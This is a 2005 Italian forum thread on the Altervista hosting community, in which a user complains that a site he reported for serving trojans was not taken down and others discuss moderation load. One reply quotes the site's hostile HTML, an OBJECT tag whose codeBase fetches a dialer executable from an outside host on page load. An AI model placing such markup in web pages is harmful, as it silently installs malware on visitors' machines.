Visualizzazione risultati 1 fino 6 di 6

Discussione: Intervenite O No!

  1. #1
    Guest

    Thumbs down Intervenite O No!

    Ho visto topic in cui si accusava alcuni utenti di rompere le palle ad altri segnalando in pubblico possibili abusi sui loro siti non permettendo, al contempo, agli amministratori di Altervista di intervenire.

    <<... non segnalate in pubblico queste situazioni, contattate in privato gli amministratori e segnalate eventuali abusi e problemi ...>>

    Bene due giorni fa ho segnalato che su questo sito (NON ANDATECI):
    censura
    ci sono 3 o 4 trojan intercettati da viruscan proprio all'apertura dell'intro.

    Sono passati due giorni e NESSUNO ha fatto NULLA e il sito continua a sparare *****.
    Può benissimo esserci stata un'intrusione da parte di terzi i quali hanno introdotto i trojan, ma siccome io non conosco il webmaster (virsuscan mi blocca il download di tutto il sito e io non ho intenzione di forzarlo vista la situazione) ho pensato che avrebbero potuto intervenire quelli di altervista (magari sospendendo momentaneamente il servizio fintanto che le cose non si fossero chiarite). E INVECE NADA !!!!

    Al di là di quelli che sono eventuali abusi su copyright di cui risponde il webmaster e quindi che si arrangi lui, o comportamenti che infrangono il regolamento di AV, ma almeno su segnalazioni di questo tipo NON SI PUO' NON INTERVENIRE SUBITO.

    Sito segnalato per il controllo

    makpaolo
    Ultima modifica di makpaolo : 19-01-2005 alle ore 14.26.24

  2. #2
    Guest

    Predefinito

    Altervista è una community di circa 150.000 persone! Se oguno inviasse anke un solo messaggio alla settimana impazzirebbero per le segnalazioni!!!!

  3. #3
    Guest

    Predefinito

    A me worm non ne da..boh

  4. #4
    Guest

    Predefinito

    Codice:
    <!--StartFragment-->
    <OBJECT id=A codeBase=http://deposito.hostance.net/dialer/1071208.exe 
    classid=CLSID:DB893839-10F0-4AF9-92FA-B23528F530AF></OBJECT>
    è solo l'installazione di qualche dialer

  5. #5
    Guest

    Predefinito

    quoto RGATE... cmq si, se si segnalassero tutti tutti i siti... O_o

    bisogna capire ke dietro ad AV ci sono persone non computer e quindi purelli mica hanno 6000 occhi... :D

  6. #6
    Guest

    Predefinito

    Citazione Originalmente inviato da cminterclub
    quoto RGATE... cmq si, se si segnalassero tutti tutti i siti... O_o

    bisogna capire ke dietro ad AV ci sono persone non computer e quindi purelli mica hanno 6000 occhi... :D
    Lo so, lo so ... per questo io proporrei l'attivazione di un canale preferenziale per le segnalazioni di casi non di abuso ma di siti che diventano "pericolosi" per gli altri. Poi dare priorità a questo canale rispetto agli altri.

Regole di scrittura

  • Non puoi creare nuove discussioni
  • Non puoi rispondere ai messaggi
  • Non puoi inserire allegati.
  • Non puoi modificare i tuoi messaggi
  •